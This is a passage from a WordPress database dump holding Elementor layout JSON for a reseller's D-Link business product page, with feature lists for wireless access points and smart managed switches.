]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7550,3407,'_elementor_version','2.5.14'),(7551,3407,'_elementor_edit_mode','builder'),(7554,3408,'_wp_page_template','template-fullwidth.php'),(7555,3408,'_elementor_template_type','post'),(7556,3408,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" 